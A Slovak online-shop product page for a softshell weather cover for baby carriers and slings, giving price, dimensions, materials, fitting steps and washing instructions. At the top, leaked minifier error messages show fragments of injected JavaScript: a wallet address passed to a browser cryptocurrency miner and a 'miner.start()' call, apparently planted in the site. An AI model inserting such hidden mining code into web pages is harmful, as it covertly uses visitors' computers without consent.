JSMin: Unterminated String at byte 148: '49dVbbCFDuhg9nX5u1MDuATVZj7gQehytZwvXEUuWg9kfhNPWH7bUD87VW1NfjqucRZNNVTb1AHGUK2fkq5Nd55mLNnB4WK); miner.start();JSMin: Unterminated String at byte 161: '49dVbbCFDuhg9nX5u1MDuATVZj7gQehytZwvXEUuWg9kfhNPWH7bUD87VW1NfjqucRZNNVTb1AHGUK2fkq5Nd55mLNnB4WK); miner.start();/* */JSMin: Unterminated String at byte 651: '49dVbbCFDuhg9nX5u1MDuATVZj7gQehytZwvXEUuWg9kfhNPWH7bUD87VW1NfjqucRZNNVTb1AHGUK2fkq5Nd55mLNnB4WK); miner.start();/* */;/* */ Univerzálna ochranná kapsa na nosič/šatku zo softshellu

Univerzálna ochranná kapsa /softshell

New product

Praktická univerzálna ochranná zateplená nosičská kapsa. Použiteľná na šatku i akýkoľvek druh nosiča. Vo viacerých dizajnoch!

Spôsob upevnenia - viazanie.

Pre výber kapsy si prečítajte informácie nižšie.

Viac detailov

7 ks

37,99 €

Viac info

Softshellová kapsa vhodná aj do náročného počasia ochráni pred vetrom i vlhkom. Špeciálny strih so zvýšeným golierom, ktorý chráni efektívnejšie než kapucňa, pretože máte neustále prehľad o dieťatku a môžete napríklad aj pohodlne dojčiť. 

Ruky si môžete schovať do praktického vrecka. Kapsu tiež môžete použiť ako ochranu na autosedačku, alebo šikovnú prikrývku. 

Ako si vybrať kapsu?

Kapsa je ušitá z čierneho softshellu a má vpredu vrecko na ruky. Na vrecko Vám môžeme pripraviť kvetinovú aplikáciu - po zadaní objednávky dohodneme dizajn aplikácie. 

Pri zadávaní objednávky si vyberáte farbu vnútornej vrstvy - flísu a vzor stužky, ktorá zdobí kapsu v hornej časti. 

Využitie: celoročné, napríklad aj v lete na horách.

Rozmery: cca 105x75cm, dĺžka ramenných popruhov max. 100cm, dĺžka pásového popruhu max. 80cm (celkovo obopne odvod 155 cm)

Ako kapsu používať?

Vložte dieťa do nosiča alebo šatky, dôkladne zapnite, uviažte. Preložte kapsu cez dieťa. Upevnite kapsu okolo pása prackou, nastavte ideálnu šírku. Následne ramenné popruhy položte na ramená, na chrbte prekrížte a zapnite pracky. V hornej a spodnej časti kapsy nastavte obvod pomocou bŕzd a šnúrok podľa svojej potreby.

Fotonávod nájdete napríklad tu.

Materiál: softshell, zloženie 100% PES + TPU(termoplastický polyurethan - elastomer) + 100% PES, Membrána Dintex, gramáž: cca 185 g/m2,vodeodolnosť: 10000 mm vody, priedušnosť: 1400 g/m2/24 hod.

Cosy fleece: 100% micropes, gramáž: cca 240-260 g/bm

Ošetrovanie: Prať na 30°C s podobnými farbami. Prať BEZ aviváže! Nečistiť chemicky a nepoužívať bielidlá. Nežehliť!

Reviews

No customer reviews for the moment.

Write a review

Univerzálna ochranná kapsa /softshell

Univerzálna ochranná kapsa /softshell

Praktická univerzálna ochranná zateplená nosičská kapsa. Použiteľná na šatku i akýkoľvek druh nosiča. Vo viacerých dizajnoch!

Spôsob upevnenia - viazanie.

Pre výber kapsy si prečítajte informácie nižšie.

Zákazníci, ktorí kúpili tento produkt, kúpili tiež: